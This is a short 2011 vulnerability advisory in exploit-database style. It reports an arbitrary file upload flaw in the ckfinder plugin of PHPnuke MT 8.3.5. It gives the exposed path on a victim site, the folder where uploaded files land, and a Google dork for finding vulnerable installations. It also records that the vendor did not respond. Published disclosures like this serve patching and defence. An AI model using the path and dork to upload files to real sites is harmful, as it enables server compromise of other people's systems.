# Exploit Title: PHPnuke MT 8.3.5 ckfinder Plugin Arbitrary File
upload Vulnerability
# Date: 2011 06 27 [GMT +7]
# Author: Net.Edit0r
# Software Link: http://www.phpnuke.ir/
# Version : 8.3.5
# Tested on: ubuntu 11.04 ~ Centos
# CVE : -
---------------------------------------------------------------------------
PHPnuke MT 8.3 ckfinder Plugin Arbitrary File upload Vulnerability => RFU
---------------------------------------------------------------------------
Author : Net.Edit0r
Date: 2011 06 27
Location : Iran
Web : http://Black-Hg.Org
Critical Lvl : Medium
Where : From Remote
My Group : Black Hat Group #BHG
---------------------------------------------------------------------------

PoC/Exploit:
~~~~~~~~~~

~ [PoC] ~:
/includes/ckfinder/ckfinder.html
le.php

~ [PoC] ~:
Http://[victim]/path-to-nuke//includes/ckfinder/ckfinder.html


[ Upload To : /includes/ckfinder/files/Filename ]

Dork:
~~~~~
Google : inurl:"PHP-Nuke Project By PHPNuke.ir"

Vedio Demo:
~~~~~
http://net-edit0r.persiangig.com/nuke.rar

Timeline:
~~~~~~~~~
- 24 - 06 - 2011 bug found.
- 27 - 06 - 2011 vendor contacted, but no response.
- 27 - 06 - 2011 Advisories release.

Contact:
~~~~~~~~~
Net.Edit0r@att.net ~ Black.hat.tm@gmail.com

---------------------------------------------------------------------------

Greetz To :DarkCoder | 3H34N | Amir-MaGiC | H3x |  and all bhg member

Spical Th4nks: B3hz4d | M4Hd1 | Cru3l.boy | Mikili | +_AttAcK_+ And
All My Friendz

[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
-------------------------------- [ EOF ] ----------------------------------